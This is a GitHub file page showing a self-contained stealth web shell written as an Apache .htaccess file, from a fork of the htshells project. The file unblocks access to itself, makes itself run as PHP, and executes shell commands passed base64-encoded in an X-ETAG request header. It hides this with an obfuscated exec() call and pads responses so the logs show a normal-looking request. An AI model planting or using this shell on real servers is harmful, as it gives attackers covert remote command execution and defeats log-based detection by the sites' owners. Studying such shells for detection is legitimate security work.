forked from mubix/htshells
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmod_php.stealth-shell.htaccess
24 lines (19 loc) · 1.22 KB
/
mod_php.stealth-shell.htaccess
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Self contained .htaccess stealth web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
# Enable output buffering so we can fudge content length in logs (see the ob_* calls)
php_value output_buffering 1
# Rewrite supposed url to the .htaccess file if X-ETAG request header is set
RewriteEngine on
RewriteCond %{HTTP:X-ETAG} !^$
RewriteRule .* .htaccess [L]
# Set $e to exec(), discard 2 byte padding on base64 encoding (breaks automated decoding), payload in X-ETAG header
# Then make sure the log contains a 200 ok response with response size of 9326 (should match the file you are impersonating or a code in a 404 response)
# SHELL <?php ob_clean(); $b= "base64"."_decode"; $e = str_replace('y','e','yxyc'); $e($b(substr($_SERVER['HTTP_X_ETAG'],2))." 2>&1", $o); header("X-ETAG: AA".base64_encode(implode("\r\n ", $o))); print str_repeat("A", 9326); ob_flush(); exit(); ?>